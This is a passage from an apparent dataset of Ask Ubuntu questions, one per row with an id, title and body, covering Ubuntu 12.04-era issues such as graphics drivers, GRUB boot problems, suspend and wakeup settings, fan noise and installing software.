/usr/lib/xorg/modules/drivers/ati_drv.so [ 15.492 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 15.492 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 15.494 ] ( ii ) loading /usr/lib/xorg/modules/drivers/radeon_drv.so also , i found this great troubleshooting guide and followed their instructions in `` problem : video card not supported by driver '' $ lspci -nn | grep vga 02:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati turks [ radeon hd 6670 ] [ 1002:6758 ] but running grep -i 10026758 /usr/share/xserver-xorg/pci/*.ids gave me nothing . i do have a file named /usr/share/xserver-xorg/pci/geode.ids , but it has no pci id 1002:6758 . also , i do n't have any file named /etc/x11/xorg.conf . i do n't understand where exactly the problem is . it maybe that the x server ca n't find 1002:6758 in geode.ids and defaults to vesa . is there a way to obtain the correct .ids file ? or should i download new amd catalyst display drivers ( fglrx ) from the amd website ?
152380	how can i remove the default indicators and add custom ones ?	i am trying to use the old ubuntu feature of adding/removing indicators from the top panel in 11.10/12.04 , but can not do so . i have these questions : how can i remove or add indicator applet at top panel ? how can i erase or add a panel ? how can i erase switch user account from top panel since i am the only user in my computer ? how can i erase startup applications and printers from top panel ? how can i erase the messages indicator from the top panel ?
152384	should i upgrade to 64 bit ubuntu with an old laptop model ?	i just realized , and i mean it literally just a few minutes ago , that my processor intel t5870 supports 64-bit . i have had this laptop ( thinkpad r61i ) for two years mainly running ubuntu 32-bit . so far i have n't had a problem with it until last week when my os ( 12.04 ) crashed due to a bad software update ( my guess ) . should i take advantage of my processor 's capability and upgrade to 64-bit ( and i know i would have to reformat my laptop completely for it ) or just let it run with 32-bit without my laptop 's performance suffering for using a higher end os ? i have a 3.9gb memory , integrated graphics , and 130gb hard drive .
152385	turn off chameleonic notification color	i would like to be able to turn off the chameleonic background color for notify osd , preferably programmatically ( through dconf or something ) . i ca n't seem to find a specific dconf key for it , and i do n't have unity installed .
152388	usb drive wiped during install	yeah i tried to install ubuntu on my computer and instead it wiped my usb drive ( which has critical files ) and now there 's ubuntu 'installed ' on my usb drive . how do i get my files back ? ! ? !
152389	can i use ubuntu installed on external hdd on macbook air ?	i have ubuntu 12.04 installed on external usb hard drive . can i use that same installation ( on same usb hdd ) on macbook air ? can you give me some advices how to boot it ? thank you in advance !
152392	disable animation	since my computer is old , i want remove/disable animation . how can i do that ? if you know more about optimization , rather than resetting swappiness , can you recommend me some other trick ? feature of my computer cpu intel ( r ) celeron ( r ) m cpu 520 @ 1.60 ghz memory 2 gb platform x86_64
152395	is there a way to find out whether an updated program/package lands in the official ubuntu release repositories ?	if there is a new release/major update of a program ( e.g . rhythmbox 2.97 , skype 4.0 or gimp 2.8 ) , is there an easy way to tell whether and when they will make it to the current official ubuntu release repositories ( especially to the lts release , e.g . ubuntu 12.04 ) ? or whether it will never be added to the official repositories , so i do n't need to wait and just install it through an added ppa/repository ? i would like to use the program updates , but preferably when they are well tested and adjusted to the ubuntu release i use ( easily updated by the update manager ) . but some programs seem to never be added/updated and as i want to stick to the lts release , i would need to add another repository . i know that there are restrictions to what will be updated ( why do n't the ubuntu repositories have the latest versions of software ? , stablereleaseupdates ) . but for example firefox and thunderbird are now regularly updated and gimp 2.8 might be available in the backports . there is list of pending ubuntu stable release updates , but i do n't find firefox , thunderbird ( or gimp ) on it , although they are updated . i just want to know how to find out whether there is an easy way to know ( e.g . one webpage ) which programs will be added/updated in the official ubuntu repositories . or do we have to ask a question on askubuntu for every single program ?
152396	complete black screen after install/update/restart in ubuntu 12.04	i just set up ubuntu 12.04 by using my usb flash disk . installation justed worked fine , but after i got the newest update package and wanted to restart ( doing so , i changed the bios boot order by putting hdd on 1st as it is normal ) , every time i try turning on my computer , just nothing at all happens ? can you tell me any reasons for this ? did i mess up my bios - and if so , how ?
152397	remove grub loader from mac	i installed ubuntu ( precise ) on my macbook pro but now i 'd like to go back to osx but i ca n't boot off the osx snow leopard dvd to do a reinstall . i have tried booting and holding down `` c '' or using `` option '' and then selecting the osx install media but after selecting the osx media the grub menu loads and tried to boot ubuntu instead of booting off the dvd . i tried booting off my ubuntu liveusb and removing all of the partitions using gparted but the problem still persists . any ideas ? i just want to wipe everything and go back to osx only . when i installed ubuntu i pretty much followed the default options . thanks .
152402	how to see startup applications ?	there are basically no applications shown in startup applications program . thus , i have some questions : how can i to make them appear again ? how can i disable some program ?
152403	how do i make changes to /proc/acpi/wakeup permanent ?	i had a problem with my ubuntu 12.04 waking up immediately after going into suspend . i solved the problem by changing the settings in /proc/acpi/wakeup , as suggested in this question : how do i prevent immediate wake up from suspend ? . after changing the settings , the system goes flawlessly into suspend and stays suspended , but after i wake it back up , the settings in /proc/acpi/wakeup are different from what i set them to . before going to suspend : cat /proc/acpi/wakeup device s-state status sysfs node smb0 s4 *disabled pci:0000:00:03.2 pbb0 s4 *disabled pci:0000:00:09.0 hdac s4 *disabled pci:0000:00:08.0 xvr0 s4 *disabled pci:0000:00:0c.0 xvr1 s4 *disabled p0p5 s4 *disabled p0p6 s4 *disabled pci:0000:00:15.0 glan s4 *enabled pci:0000:03:00.0 p0p7 s4 *disabled pci:0000:00:16.0 p0p8 s4 *disabled p0p9 s4 *disabled usb0 s3 *disabled pci:0000:00:04.0 usb2 s3 *disabled pci:0000:00:04.1 us15 s3 *disabled pci:0000:00:06.0 us12 s3 *disabled pci:0000:00:06.1 pwrb s4 *enabled slpb s4 *enabled i tell the system to suspend , and it works as it should . but later after waking it up , the settings are changed to either : usb0 s3 *disabled pci:0000:00:04.0 usb2 s3 *enabled pci:0000:00:04.1 us15 s3 *disabled pci:0000:00:06.0 us12 s3 *enabled pci:0000:00:06.1 or usb0 s3 *enabled pci:0000:00:04.0 usb2 s3 *enabled pci:0000:00:04.1 us15 s3 *enabled pci:0000:00:06.0 us12 s3 *enabled pci:0000:00:06.1 any ideas ? thank you for your response . unfortunately it did not solve my problem . all of /sys/bus/usb/devices/usb1/power/wakeup /sys/bus/usb/devices/usb2/power/wakeup /sys/bus/usb/devices/usb3/power/wakeup /sys/bus/usb/devices/usb4/power/wakeup as well as /sys/bus/usb/devices/3-1/power/wakeup are set to disabled , and the notebook still wakes up by itself right after going to sleep . the only thing it seems to react to are the settings in /proc/acpi/wakeup , which keep changing ( resetting ) every time i power off/restart my notebook .
152412	make ubuntu fonts sharper	in the last two months i 'm trying to do a complete transition from windows 7 to ubuntu . there is something that is really missing . i really like the sharp and think fonts in windows ( i 'm not talking about the font type - 'arial ' , 'consolas ' atc. ) . i think that the ubuntu fonts looks better , but after several hours i feel like my eyes are really tired . btw - i have the same problem with the apple computer at work too ( macbook pro ) . is it a theme issue ? can i change it by configuration ? can you recommend a solution ?
152420	development environment for linux wireless using sparse	i am used to eclipse and visual studio for development for java and c # . i am looking forward to modify and compile some files in c in the linux wireless subsystem . the site recommends using sparse but there is n't much documentation regarding it . can sparse be used as a development environment like eclipse . any documentation regarding this ?
152423	how to set global system settings that can apply to all new added users .	to say specifically , i mean preferences that can be configured in system settings . how to make them apply to each new user account i create ?
152424	add multimedia keyboard shortcuts in xubuntu	how do you add ( or change ) multimedia key shortcuts in xubuntu . specfically i would like to set the forward and back keys to next and previous tracks in exaile using the xkeys plugin .
152428	how to ssh into local juju instance ?	i 'm writing a charm that i deploy on a local juju instance . works great , but it would help debugging the charm if i were able to ssh into the instance . is there a way to do this ?
152431	ubuntu hangs frequently	i have an athlon x2 7750 , 2gb ram and i installed ubuntu 12.04 lts on 8gb moser baer pen drive . software i installed are : apache2 , php5 , mysql-server , mysql-workbench , komodo-edit , anjuta . i also wanted gimp but i stopped . problem is ubuntu stops responding after 3-4 minute and start responding again for 3-4 minutes . and this continues . i 'm use windows 7 and do not know much about linux , i wanted to install it on my hard disk . can community help me on how to get smooth ubuntu ? ? ?
152439	tools for documentations	i am trying to do good documentation of products list . like creating a software test documentation with test id , test name , etc . can you recommend a good , platform independent etc . software available in ubuntu 12.04 ? of course , can you give one or two sentences to give reason why you recommend it ?
152440	samsung 530u overheating	i 've recently installed ubuntu precise 12.04 lts alongside with ms windows 7 on my notebook samsung 530u . i 'm using both via dual-boot mode . i 've no heating problem with ms win 7 and the fan speed is normal even with long run utilization . however , when booting with ubuntu and after short time , the pc got very hot and the fan was running at max speed . i installed a tool called jupiter , i put it in `` power saving '' mode but no result . now , i avoid using ubuntu because i fear it 'll damage my all new notebook .
152441	how to fix laggy mouse and keyboard on ubuntu 10.04 lts 64bit ?	i 've just installed ubuntu 10.04 lts 64bit on my i5-2400 system , and i 'm experiencing very laggy keyboard and mouse input . i have to type really slowly or i some keys will not get registered . also , the mouse cursor moves around very slowly at a very low frame rate . i 've checked my keyboard and mouse settings and they seem to be fine . system monitor does n't show any processes taking up significant cpu utilization . what else could be wrong ? anyway , i 'm using 10.04 lts since i 'm building the android source code and that 's the official supported version . i tried using 12.04lts but it did n't work . and my keyboard/mouse are both usb , not ps/2 . i suspect it 's a driver issue , probably something to do with my usb drivers , but not sure where to get updated drivers backported for 10.04 ?
152442	sound not working in ubuntu 11.10	please help me , i have tried everything but still sound is not working on my ubuntu 11.10 . i am new to ubuntu . searched everywhere then i finally decided to ask a question here . hope someone can help me ! !
152443	stuck at boot , both with wubi and usb	i have tried installing ubuntu 12.04 through usb and with wubi interface . nothing works . with usb , i will enter the main menu , does n't matter what i choose , `` install ubuntu on a hard drive '' or `` boot into ubuntu from usb '' . when i click on one of those it will scan my drives or something , and when it gets to the usb it gets stuck . it just stays there ... . with wubi , the install goes fine , but when trying to boot for the first time to ubuntu it says `` completing ubuntu installation '' ... nothing more happens , that cursor only blinks there . how can i get ubuntu to work ? ? ? i got : 1tb hdd , 256gb hdd , 80gb ssd . i 'm trying to install ubuntu on my 256 gb hdd ... .
152453	how to reduce the fan noise and how to increase battery life ?	i have a brand new sony vaio s series laptop . ( vpcsa2dgx ) it came factory installed with windows 7 professional edition 64bit . runs intel core i5 , 500 gb hdd , 4gb ram . first i installed ubuntu 11.10 64 bit along side windows to dual boot . later , since the problem did not solve , i installed ubuntu 12.04 64bit along side windows to dual boot . however the problem keeps annoying me . problem : when running ubuntu 11.10/12.04 , the battery lasts only about 1.5 hours . the fan runs loud and continuously . and there is a lot of heat generated . system monitor shows less than 5 % cpu used . my laptop enjoys hybrid graphic and i tried turning off adm graphic card and keep intel graphic card on . however i can not get the fan noise or heat to go away and consequently the battery drain continues . btw , in windows , the laptop gives 4-5 hours of battery power , fan is silent and there is no heat problem . any ideas on how to reduce the fan noise and how to increase battery life in ubuntu 11.10/12.04 ?
152461	adding play framework directory to my system path on ubuntu 12.04 lts	i just installed ubuntu 12.04 lts , i am very new to the ubuntu os and i would need help with it . i am trying to install this open source platform called play framework , to install it i need to add the installation directory to my system path , the documentation for play says that i should open a terminal and type export path= $ path : /to/path/play . i have tried this it did not work . i also tried sudo apt-get install play and that did not work either . i am completely lost now , i need help .
152462	ubuntu killing processes when no more ram is available	on an ubuntu box with 4gb , i am running apache with some mpm + mysqld . furthermore , there is a postfix , mongod and ocassionaly some imagemagick/convert processes active . on 99 % of the days , that 's fine . however , sometimes ( not at peak times , but e.g . at 3am in the morning - although backup process start few hours late ) the server runs out of ram . then it 's killing processes and unfortunately it 's starting with apache and/or mysqld : - ( do i have a chance to define which process is `` important '' or high-priority ? e.g . i 'd define 1 ) apache 2 ) mysql 3 ) postfix 4 ) convert 5 ) mongod < - as far as i know , mongod is very polite and will release ram for other applications if needed . btw . the system is not running out of memory because of ghost processes ; i use some cleaner scripts which make sure that unused ram is recycled : - ) thx
152464	how to run an application in /opt ?	i want to know how one can run his application in /opt and installed in /opt . i want it for the ubuntu app showdown http : //developer.ubuntu.com/showdown/ i will be using qt with qt creator and c++ ; will qt and qt creator automatically install in /opt ? do most frameworks by default install in /opt ? a few more questions : will qt take advantage of unity ? ok , qt is cross platform with maintaining the platform uniqueness , it integrates with ubuntu so are there libraries for c++ to for unity and are they easy to use and install http : //unity.ubuntu.com some we can find here ? can i have plugins for that app , and will plugin will make good sense to improve the app ? basically plugins like unity lenses and that integrates in ubuntu . i will put them in ubuntu software center but i will use quickly to create them , so will they affect my project , will judges see that ? so as i understand , every application submitted to ubuntu software center will be considered for competition or do i have to mark them ?
152468	copy and pasting web page content into an office application .	i want take information from any website and paste it into libre office ( text and images ) . firstly , i want record the name/url , description and some basic information from each website . afterwards , my intention is to copy/paste the web-page content into libreoffice in order to analyze it . can libre office do this and is it my best option ? if not can you recommend a tool which is available for 12.04 ?
152472	live mail folder and thunderbird	me friends hello , guys i 'm facing a small issue and that is , i created a new account ( ms live email account ) on thunderbird and set the incoming protocol to imap and `` pop3.live.com '' port no 995 , ssl to ssl/tls and outgoing protocol to smtp and `` smtp.live.com '' port no 25 , ssl to starttls now what i want is that there are sub folders in my web based live email account which are not appearing when i create the account in thunderbird . please tell me how to get this thing done
152475	software for creating dynamic list of things ?	i want create a list of product with their name and price . like a table at database . example : id name price date | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | can you recommend me a software , which is available at 12.04 ?
152476	ubuntu session crashes : gdk-warning : gnome-session : fatal io error 11	this happens on an acer 7535 notebook with an amd athlon 64 x2 cpu and ati radeon hd3200 graphics , ubuntu 12.40 64-bit . every now and then , the unity 2d session crashes and the user is sent to the login screen . it seems to happen frequently when restarting firefox . these are two parts of the syslog i found related to the crash : jun 18 12:30:53 aspire-7535 kernel : [ 4794.917287 ] [ fglrx ] irq 18 disabled jun 18 12:30:53 aspire-7535 gnome-session [ 3086 ] : gdk-warning : gnome-session : fatal io error 11 ( ressource temporairement non disponible ) on x server :0. # 012 jun 18 12:30:53 aspire-7535 kernel : [ 4795.002229 ] show_signal_msg : 36 callbacks suppressed jun 18 12:30:53 aspire-7535 kernel : [ 4795.002235 ] firefox [ 8721 ] : segfault at c ip 00007f5ca6f50cc0 sp 00007fff28fc3ec8 error 4 in libxcb-glx.so.0.0.0 [ 7f5ca6f43000+15000 ] jun 18 12:30:53 aspire-7535 acpid : client 2890 [ 0:0 ] has disconnected jun 18 12:30:53 aspire-7535 acpid : client connected from 8737 [ 0:0 ] jun 18 12:30:53 aspire-7535 acpid : 1 client rule loaded jun 18 12:30:54 aspire-7535 kernel : [ 4795.481828 ] [ fglrx ] gart table is not in frame_buffer range jun 18 12:30:54 aspire-7535 kernel : [ 4795.482280 ] [ fglrx ] could not enable msi ; system prevented initialization jun 18 12:30:54 aspire-7535 kernel : [ 4795.483242 ] [ fglrx ] firegl kernel thread pid : 8740 jun 18 12:30:54 aspire-7535 kernel : [ 4795.483544 ] [ fglrx ] firegl kernel thread pid : 8741 jun 18 12:30:54 aspire-7535 kernel : [ 4795.483707 ] [ fglrx ] firegl kernel thread pid : 8742 jun 18 12:30:54 aspire-7535 kernel : [ 4795.484101 ] [ fglrx ] irq 18 enabled jun 18 12:30:54 aspire-7535 kernel : [ 4795.746103 ] [ fglrx ] gart uswc size:1156 m. jun 18 12:30:54 aspire-7535 kernel : [ 4795.746108 ] [ fglrx ] gart cacheable size:458 m. jun 18 12:30:54 aspire-7535 kernel : [ 4795.746114 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 jun 18 12:30:54 aspire-7535 kernel : [ 4795.746118 ] [ fglrx ] reserved fb block : unshared offset : fffb000 , size:5000 and an earlier part : jun 18 11:41:22 aspire-7535 kernel : [ 1823.743059 ] [ fglrx ] irq 18 disabled jun 18 11:41:22 aspire-7535 gnome-session [ 1448 ] : gdk-warning : gnome-session : fatal io error 11 ( ressource temporairement non disponible ) on x server :0. # 012 jun 18 11:41:22 aspire-7535 acpid : client 1102 [ 0:0 ] has disconnected jun 18 11:41:22 aspire-7535 acpid : client connected from 2890 [ 0:0 ] jun 18 11:41:22 aspire-7535 acpid : 1 client rule loaded jun 18 11:41:22 aspire-7535 kernel : [ 1824.069666 ] [ fglrx ] gart table is not in frame_buffer range jun 18 11:41:22 aspire-7535 kernel : [ 1824.073399 ] [ fglrx ] could not enable msi ; system prevented initialization jun 18 11:41:22 aspire-7535 kernel : [ 1824.078887 ] [ fglrx ] firegl kernel thread pid : 2892 jun 18 11:41:22 aspire-7535 kernel : [ 1824.079097 ] [ fglrx ] firegl kernel thread pid : 2893 jun 18 11:41:22 aspire-7535 kernel : [ 1824.079239 ] [ fglrx ] firegl kernel thread pid : 2894 jun 18 11:41:22 aspire-7535 kernel : [ 1824.079420 ] [ fglrx ] irq 18 enabled jun 18 11:41:22 aspire-7535 kernel : [ 1824.322990 ] [ fglrx ] gart uswc size:1156 m. jun 18 11:41:22 aspire-7535 kernel : [ 1824.322995 ] [ fglrx ] gart cacheable size:458 m. jun 18 11:41:22 aspire-7535 kernel : [ 1824.323002 ] [ fglrx ] reserved fb block : shared offset:0 , size:1000000 jun 18 11:41:22 aspire-7535 kernel : [ 1824.323005 ] [ fglrx ] reserved fb block : unshared offset : fffb000 , size:5000 i would like to know if anyone else is having the critical problem , and if someone knows what exactly is causing these crashes , or , even better , what can be done to fix this problem . ps : i have noticed this is a very old issue , yet i could n't find any solution . this issue has been submitted as a bug a number of times . thanks for not closing this question as being `` off-topic '' . thanks a lot in advance !
152480	installing ubuntu in a pen drive instead of hard disk	i have made a bootable pendrive for ubuntu 12 . 04 . currently i am running it like a live cd by just using `` try ubuntu '' option . but i want to install it . the issue is i do n't want to install it in the hard drive of my laptop , as it is an office laptop . can i install it in another pen drive ? the scenario will be like that i will use all hardware resources of my laptop as it has 8 gb ram and i % processor . i just do n't want to mess with the hard disk . that 's why i want to install ubuntu on another 32 gb pen drive which would act my hard disk . kindly suggest the steps .
152481	fish shell can not tab complete	i am using ubuntu 12.04 x64 and i have installed the fish shell recently from http : //ridiculousfish.com/shell/ , and i am quite fond of it . but the downside of using it is , it gives me below sigsegv error when i try to use the tab-completion feature : fish : process 17820 , “fish_pager” from job 1 , “fish_pager -c 3 -r 4 -p ''” terminated by signal sigsegv ( address boundary error ) how can i prevent this from happening ? any ideas will be appreciated .
152484	how to take screenshot while a menu is open	i recently wanted to take a screen shot of a nautilus menu to provide an image to the answer of a nautilus related question . ( i was looking for it ) . but when i opened up the menu and press the prtsrc key , nothing happened . i have also tried shift+prtsrc key and alt+prtscr key . result was the same . my question is : is is not possible not take a screenshot while you have a menu open ? . is it bug or not ? note : to test this , just right-click on the desktop , and press prtsrc key .
152485	ubuntu-windows : unhide hidden drive	i am installing two os : ubuntu and windows7 in my system . i have 3 drives , c : windows7 is installed . d : ubuntu is installed . e : my personal files are stored . problem : when i use windows7 , i could not see d : drive . is that the security feature of linux ? how can i unhidden the drive in win7 ?
152488	how do i get a cpu frequency scaling monitor on 12.04 ?	i just updated my linux computer from 64-bit ubuntu 10.04 to 64-bit ubuntu 12.04 . on that bar along the top of the screen in 10.04 are 8 little icons that display the current speed of each of the 8 cores in my cpu ( amd fx-8150 ) . and i can right-click on them and change various settings , like the current core-speed policy for each core . another applet displays 6 similar-style icons that display the current temperature of gpu , cpu , motherboard , hdds , etc . these applets are just fantastic ! now that i 'm running 64-bit ubuntu 12.04 , i 'm trying to get my desktop set up again , and i have been very unsuccessful at installing or replacing these applets . i installed the lm-sensors and psensor packages and a few other packages , but typically they just display some large conventional window on the desktop and do n't have anywhere near the functionality ( and generally do n't show all the devices ) . i searched , downloaded , installed and tested just about every applet i could find that has anything to do with cpu-core speed and temperatures , but everything is lame , lame , lame in comparison . i also downloaded and installed the gnome `` cpu frequency scaling monitor '' applet and the gnome `` hardware sensors applet '' . but they do n't appear to do anything when i run them ( nothing appears ) . if i 'm not mistaken , these are the two applets that run on my 10.04 system . what 's the solution ? how can i get those applets to work with 64-bit ubuntu 12.04 ? ? ? later : a partial answer , but not nearly as convenient as adding applets to ubuntu 12.04 itself . execute gnome-panel , remove the top-panel ( or move it to the right side of the desktop and make it autohide ) , add applets to bottom panel ( found cpu-core frequency applet , but not temperature applet yet ) . the basic process of adding the gnome-panel is at this askubuntu link . however , that answer is missing some important details . first , you ca n't do much of anything with the existing gnome panels unless you hold down the alt and super key before you right-click the panel you want to remove , configure , add-applets-to , etc . when you add-applets , you must add 8 of the cpu-frequency applets to display the speed of all 8 cores ( or as many applets as you have cores ) . after you install as many cpu-core-frequency applets as you have cores in your cpu , you need to right-click each one , then select preferences and specify which core each icon provides information for . otherwise you 'll have 8 icons all showing the speed of cpu # 0 -- - not very useful ! i found it more-or-less necessary to make the gnome panels auto-hide ( and be mostly transparent and approximately the same color as the desktop ) . then `` gnome-panel '' must be added to startup applications to make it appear whenever the computer is started . the gnome-panel settings and whatever applets were added to the panel will be remembered and restarted by the gnome-panel application . anyone who can make these applets work on unity without this hack , please let us know !
152499	rsnapshot with two alternating hard drives	i am using ubuntu server 10.04 with rsnapshot ; i plan on alternating the backup external hdd every week . the rsnapshot.conf : snapshot_root /media/backup_disk_1/backup no_create_root 1 . there is a hourly , daily , weekly and monthly cron job . if i was to switch to the 2nd external hdd then i would need to setup another mount with it 's uuid and mount to /media/backup_disk_2 then i would need to manually change the root location in rsnapshot.conf snapshot_root /media/backup_disk_2/backup no_create_root 1 . is there an automated way to do this instead of changing the config file everytime i alternate between the hdd ? will mounting both of the external hdd to /media/backup_disk_1 work ? so no matter which hdd i mount they will all mount to /media/backup_disk_1 .
152505	remove `` computer '' and `` network '' categories from nautilus sidebar ( ubuntu 12.04 running cinnamon 1.4 )	i am wondering if it is possibly to completely remove the `` computer '' and `` network '' categories from nautilus sidebar . i would like to do this because the locations that fall under them can not be edited and i do n't use those . instead , i prefer to specify my own locations which i can do through the bookmarks . this is all fine , but the `` computer '' and `` network '' just sit there doing nothing ( potentially distracting ) . it seems these categories are hardcoded in nautilus 3.4.2 ? at least i ca n't find a way to remove them . any suggestions are welcomed .
152509	unwanted dialog when clicking link to download file	every time when i click some links ( which opens another document ) , there comes a dialog ( see the screen-shot ) and i then have to close it manually . this is really unnecessary , unwanted and irritating ( for my mindset ) . are there any way to prevent this dialog from popping up ? i am using ubuntu 12.04 lts and firefox .
152511	link proxy settings to particular wifi network	is there a way to automatically set proxy settings based on which wifi network you are connected to ?
152517	making intellij idea community edition available in software repository	i 'd like to package intellij idea ( community ) to make it available from the standard ubuntu software center . how do i go about this ?
152519	why does `cd downloads` fail with `` no such file or directory '' ?	running ubuntu 12.04 , while in a terminal , i type ls and see list of folders , including the downloads folder . i then type cd downloads , press enter . i get bash : cd : downloads : no such file or directory i tried each folder , on two computers . what am i missing ?
152521	hdmi sound cut out until relog 12.04 / amd hd 6450	i have an ubuntu 12.04 machine hooked up via an ati/amd hd 6450 card through hdmi to my sony hdtv . i am using a recent version of the proprietary fglrx / catalyst drivers from amd . the audio goes along the hdmi . when i change the channel or let my computer sleep i lose audio . logging off and then back on makes it work again . any ideas what is causing the audio to drop ? any ideas as to how logging off and then logging back in restores audio ? is it possible to do the thing that logging off and then back in does wrt to audio via a command-line command ?
152531	upgrade from 11.10 to 12.04 boot problem	i’ve used ubuntu for 3 months now so i’m quite new to linux or unix systems . and would love any help anyone can give me on this problem . i recently upgraded my machine from 11.10 to 12.04 . at first my grub was weird ( dual boot ) , now i’m able to get into windows . however , when i select ubuntu 12.04 , it would briefly show the startup screen then it just goes to tty1 and prompting me for username and password . after i enter my username and password i can use the system fine in terminal . how can i get back the desktop ? let ubuntu work properly ? after i get to tty1 , there are three lines of error that keep repeating , they are as followed . [ 799.17958 ] ieee80211 phy0 : wl_ops_bss_info_changed : associated [ 799.23426 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_change : disassociated [ 799.36745 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) the numbers in front would keep on changing . after i typed startx the whole screen goes blank ... .i 'm looking at the log file ... .i do n't know what to look for it 's vary long maybe i try to upload this file somewhere so that you can have a look ? ? ? my xorg.0.log file is here pastebin.com/t22svw4u
152535	why ca n't i install grub on my usb drive ?	i 'm trying to install lubuntu to a usb drive , but i 'm having a difficult time installing grub to the drive . the rest of the install seems to go fine . this is what i have tried went through the normal install process . at the end of the process i got an error executing 'grub-install /dev/sdf ' failed . this is a fatal error . it then prompted me to try to reinstall grub or continue without a bootloader . i attempted to reinstall , but this seemed to have no effect as i was left with a non-bootable drive . after the normal install failed i tried mount /dev/sdf1 /mnt/usb grub-install -- force -- no-floppy -- root-directory=/mnt/usb /dev/sdf this gave me an error . i ca n't remember the exact error at the moment , but i can try to run it again later and edit the question . i then ran boot-repair and used the advanced options to select `` reinstall grub '' on `` /dev/sdf '' . boot-repair would n't do this on my normal install ( i do n't know why ) and told me i needed to boot into a livecd environment . i did this and boot-repair ran , but gave an error . i do n't know why , it simply said , `` boot-repair ran with errors . '' nothing more descriptive than that . needless to say , i still could n't boot . i finally tried the following sudo mount -t ext3 /dev/sdf1 /mnt/usb sudo mount -t proc none /mnt/usb/proc sudo mount -o bind /dev /mnt/usb/dev sudo chroot /mnt/usb /bin/bash grub-install /dev/sdf this gave no errors and seemed to successfully install grub to my usb drive . unfortunately it still does n't boot . when i boot from the drive i get a blank screen with a flashing cursor . how can i install grub to this disk and get it to successfully boot ? moreover , why is the grub install failing in the first place ?
152537	how to change project page name ?	hi i am taking part in the app showdown but i made a typo on my project while creating it . can i change this in such a way that the page is changed too ? my app name is liberedit however my typo resulted in libereedit , so if possible i would like to change that . i did manage to change its display name correctly just not its page name though , but if possible i 'd like to get the project page link right too .
152538	huawei e303c data-card not working for ubuntu 11.04 ?	cheers to you . i got a problem in making a mobile-broadband connection in ubuntu 11.04 , using 'huawei e303c ' usb data-card . i 'm using tata docomo 3g sim-card ( india , circle : maharastra ) . my observations : i installed the device 's driver 'mobile-partner for linux ' ( which came up with the device ) . but it is not detecting my device . in network manager , adding a mobile-broadband connection is not able to detect the device ( with or without the device 's driver installed ) . i tried softwares like usb_modeswitch , gnomeppp , wvdial , sakis3g and followed their guidelines . these too did n't work . without the driver , the system is able to identify the device ( mobile-partner icon comes-up , that leads to driver setup files ) . but after installing the driver , nothing comes-up there . in all the above cases , when 'lsusb ' cmd is fired , the prompt shows the connected data card ( as 'device_id : vendor_id huawei technologies ltd. , ' ) . this is my problem . give a solution to get my device connected . -umash
152539	how to make grub stop appearing every time i boot ?	i 'm using ubuntu 12.04 and grub selections appear each time i boot . this happens on both of my computers . i have tried editing the /etc/defaults/grub to use default , to use the 0 entry , and ran the update on it . but nothing seems to solve the problem . ( showing uncommented lines ) $ sudo nano /etc/default/grub grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' $ sudo update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-25-generic-pae found initrd image : /boot/initrd.img-3.2.0-25-generic-pae found linux image : /boot/vmlinuz-3.2.0-24-generic-pae found initrd image : /boot/initrd.img-3.2.0-24-generic-pae found memtest86+ image : /boot/memtest86+.bin no volume groups found done
152542	gitslave make install not working ?	after upgrading to 12.04 , i 'm trying to setup gitslave . this worked on 11.10 with version gitslave 2.0.1 ( fyi : i tested 2.0.1 on 12.04 ... same result ) . $ tar xvzf gitslave-2.0.2.tar.gz gitslave-2.0.2/ gitslave-2.0.2/web/ gitslave-2.0.2/web/index.html gitslave-2.0.2/web/makefile gitslave-2.0.2/web/releasenotes.txt gitslave-2.0.2/web/tutorial.css gitslave-2.0.2/web/tutorial-basic.html gitslave-2.0.2/prep_gitscheck gitslave-2.0.2/gits gitslave-2.0.2/makefile gitslave-2.0.2/releasenotes gitslave-2.0.2/readme gitslave-2.0.2/contrib/ gitslave-2.0.2/contrib/gitslave.spec.in gitslave-2.0.2/contrib/makefile gitslave-2.0.2/contrib/gitslave.spec gitslave-2.0.2/contrib/.gitignore gitslave-2.0.2/contrib/gitin gitslave-2.0.2/contrib/gits-checkup gitslave-2.0.2/.gitignore gitslave-2.0.2/bugstodo gitslave-2.0.2/license.readme gitslave-2.0.2/license.txt $ cd gitslave-2.0.2 $ make make -c web make [ 1 ] : entering directory `/home/tim/desktop/gitslave-2.0.2/web' make [ 1 ] : `gits-man-page.html ' is up to date . make [ 1 ] : leaving directory `/home/tim/desktop/gitslave-2.0.2/web' make -c contrib make [ 1 ] : entering directory `/home/tim/desktop/gitslave-2.0.2/contrib' make [ 1 ] : nothing to be done for `all ' . make [ 1 ] : leaving directory `/home/tim/desktop/gitslave-2.0.2/contrib' $ sudo make install -c contrib make : entering directory `/home/tim/desktop/gitslave-2.0.2/contrib' mkdir -p //usr/local/share/man/man1 //usr/local/bin install -m 444 gits-checkup.1 //usr/local/share/man/man1 install -m 444 gitin.1 //usr/local/share/man/man1 install -m 444 gitin.1 //usr/local/share/man/man1/gitout.1 install -m 755 gits-checkup //usr/local/bin install -m 755 gitin //usr/local/bin/ install -m 755 gitin //usr/local/bin/gitout make : leaving directory `/home/tim/desktop/gitslave-2.0.2/contrib' $ gits no command 'gits ' found , did you mean : command 'gitps ' from package 'gnuit ' ( universe ) command 'giws ' from package 'giws ' ( universe ) command 'gitg ' from package 'gitg ' ( universe ) command 'gitk ' from package 'gitk ' ( main ) command 'gist ' from package 'yorick ' ( universe ) command 'git ' from package 'git ' ( main ) gits : command not found what am i doing wrong ? update : the gits file does n't seem to be installed into the right directory $ sudo find / -name 'gits' /home/tim/desktop/gitslave-2.0.2/gits ~/desktop/gitslave-2.0.2 $ ./gits usage : gits [ -p| -- parallel count ] [ -v| -- verbose ] + [ -- quiet ] [ -- rawout ] [ -- help ] [ -- version ] [ -n| -- no-pager ] [ -- paginate ] [ -- eval-args ] [ -- exclude slave-regexp ] [ -- keep-going ] [ -- no-commit ] [ -- no-hide ] [ -- no-progress ] update embarrassed and annoyed ... .all it required was a reboot . it suddenly worked this morning , after a good 